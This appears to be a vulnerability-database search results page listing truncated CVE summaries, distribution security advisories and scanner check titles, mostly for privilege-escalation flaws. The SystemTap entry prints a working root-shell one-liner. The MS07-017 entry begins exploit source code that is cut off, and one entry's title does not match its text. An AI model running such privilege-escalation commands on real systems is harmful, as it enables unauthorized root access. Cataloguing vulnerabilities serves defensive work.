121 matches found
CVE-2014-8583
modwsgi before 4.2.4 for Apache, when creating a daemon process group, does not properly handle when group privileges cannot be dropped, which might allow attackers to gain privileges via unspecified vectors...
Hardcoded credentials
modwsgi before 4.2.4 for Apache, when creating a daemon process group, does not properly handle when group privileges cannot be dropped, which might allow attackers to gain privileges via unspecified vectors...
CVE-2014-8595
arch/x86/x86emulate/x86emulate.c in Xen 3.2.1 through 4.4.x does not properly check privileges, which allows local HVM guest users to gain privileges or cause a denial of service crash via a crafted 1 CALL, 2 JMP, 3 RETF, 4 LCALL, 5 LJMP, or 6 LRET far branch instruction...
openSUSE Security Update : MozillaFirefox (openSUSE-SU-2011:0958-1)
Mozilla Firefox was updated to version 3.6.20. It fixes bugs and security issues. Following security issues were fixed: http://www.mozilla.org/security/announce/2011/mfsa2011-30.html Mozilla Foundation Security Advisory 2011-30 MFSA 2011-30 - Miscellaneous memory safety hazards Mozilla developers...
openSUSE Security Update : MozillaFirefox (openSUSE-SU-2014:0599-1)
This is a MozillaFirefox update to version 29.0 : - MFSA 2014-34/CVE-2014-1518/CVE-2014-1519 Miscellaneous memory safety hazards - MFSA 2014-36/CVE-2014-1522 bmo995289 Web Audio memory corruption issues - MFSA 2014-37/CVE-2014-1523 bmo969226 Out of bounds read while decoding JPG images - MFSA...
Fortinet FortiWeb 4.x / 5.x < 5.0.3 Multiple Vulnerabilities
The remote host is running FortiWeb 4.x / 5.x prior to 5.0.3. It is, therefore, affected by multiple vulnerabilities : - FortiWeb is affected by a cross-site scripting vulnerability due to a failure to sanitize user-supplied input. CVE-2014-1955 - FortiWeb is affected by an unspecified HTTP heade...
[SECURITY] [DSA 2684-1] libxrandr security update
------------------------------------------------------------------------- Debian Security Advisory DSA-2684-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff May 23, 2013 http://www.debian.org/security/faq -...
CentOS Update for libvorbis CESA-2012:0136 centos5
Check for the Version of libvorbis OpenVAS Vulnerability Test CentOS Update for libvorbis CESA-2012:0136 centos5 Authors: System Generated Check Copyright: Copyright c 2012 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it...
SystemTap - Local Privilege Escalation
SystemTap - Local Privilege Escalation CVE-2010-4170 printf "install uprobes /bin/sh" exploit.conf; MODPROBEOPTIONS="-C exploit.conf" staprun -u whatever RHEL Advisory: https://rhn.redhat.com/errata/RHSA-2010-0894.html...
Native Instruments Service Center 2.2.5 Local Privilege Escalation Vulnerability
Summary The NI Service Center is a service used for Product Activation. Description The Native Instruments's Service Center suffers from an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist...
CVE-2010-3351
startBristol in Bristol 0.60.5 places a zero-length directory name in the LDLIBRARYPATH, which allows local users to gain privileges via a Trojan horse shared library in the current working directory...
CVE-2010-1646
The secure path feature in env.c in sudo 1.3.1 through 1.6.9p22 and 1.7.0 through 1.7.2p6 does not properly handle an environment that contains multiple PATH variables, which might allow local users to gain privileges via a crafted value of the last PATH variable...
Lenovo Hotkey Driver <= v5.33 Privilege Escalation Exploit
Exploit for unknown platform in category local exploits ========================================================== Lenovo Hotkey Driver in Lenovo Hotkey Driver and Access Connections version =v5.33 Impact: A privilege escalation attack can be used as a backdoor to bypass login and run arbitrary...
PHP 5.1.2 file.c 权限提升漏洞
No description provided by source...
openSUSE Security Update : MozillaFirefox (MozillaFirefox-1708)
The Mozilla Firefox was updated to version 3.5.6, fixing lots of bugs and various security issues. The following issues were fixed : - MFSA 2009-65/CVE-2009-3979/CVE-2009-3980/CVE-2009-3982 Crashes with evidence of memory corruption rv:1.9.1.6 - MFSA 2009-66/CVE-2009-3388 bmo504843,bmo523816 Memo...
avast! Multiple Vulnerabilities (Oct 2009) - Windows
avast! AntiVirus is prone to multiple vulnerabilities. SPDX-FileCopyrightText: 2009 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:avast:antivirus";...
CVE-2009-1894
Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the application setting LDBINDNOW to 1, and then calling execv on the target of the /proc/self/exe symlink...
openSUSE 10 Security Update : MozillaThunderbird (MozillaThunderbird-5098)
This update brings Mozilla Thunderbird to security update version 2.0.0.12 Following security problems were fixed : - MFSA 2008-11/CVE-2008-0594 Web forgery overwrite with div overlay - MFSA 2008-10/CVE-2008-0593 URL token stealing via stylesheet redirect - MFSA 2008-09/CVE-2008-0592 Mishandling ...
SuSE 10 Security Update : MozillaFirefox (ZYPP Patch Number 3932)
This update brings Mozilla Firefox to security update version 2.0.0.5 Following security problems were fixed : - Crashes with evidence of memory corruption The usual collection of stability fixes for crashes that look suspicious but haven't been proven to be exploitable. MFSA 2007-18 25 were in t...
MS Windows GDI Local Privilege Escalation Exploit (MS07-017)
No description provided by source. define WIN32WINNT 0x0500 include windows.h include shlwapi.h include stdio.h pragma comment lib, "user32.lib" pragma comment lib, "gdi32.lib" pragma comment lib, "shlwapi.lib" pragma comment lib, "ntdll.lib" / Here is a sploit for the GDI MS07-017 Local Privileg...